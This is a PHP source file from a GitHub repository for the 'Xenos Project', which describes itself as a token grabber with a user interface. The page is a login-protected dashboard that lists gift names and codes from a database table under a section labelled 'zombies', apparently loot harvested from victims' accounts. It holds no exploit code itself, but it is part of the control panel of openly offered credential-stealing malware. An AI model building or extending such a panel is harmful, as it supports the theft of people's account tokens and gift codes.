-
Notifications
You must be signed in to change notification settings - Fork 72
/
gifts.php
45 lines (36 loc) · 1.14 KB
/
gifts.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
<?php
require_once('Inc/fonctions.php');
if(!CheckLogin()){
header('Location: login');
}
$title = "Gifts";
require('Inc/Dash.php');
?>
<!-- Main -->
<section class="section_main">
<div class="main">
<img src="assets/images/xenos.gif" alt="">
<h1>Xenos Project</h1>
<p>The Best Most powerfull token grabber with user interface.</p>
</div>
</section>
<section class="section_zombies">
<div id="zombies" class="zombies">
<?php
global $bdd;
$resp = $bdd->query('SELECT * FROM gifts');
while ($gift = $resp->fetch()) {
?>
<div class="gift">
<span><?=$gift["gift_name"];?></span>
<p><?=$gift["code"];?></p>
</div>
<?php } ?>
</div>
</section>
<footer>
Copyright ©️ Made By <a target="_blank" href="https://github.com/KanekiWeb">Kaneki Web</a>
</footer>
<script src="assets/js/filter.js"></script>
</body>
</html>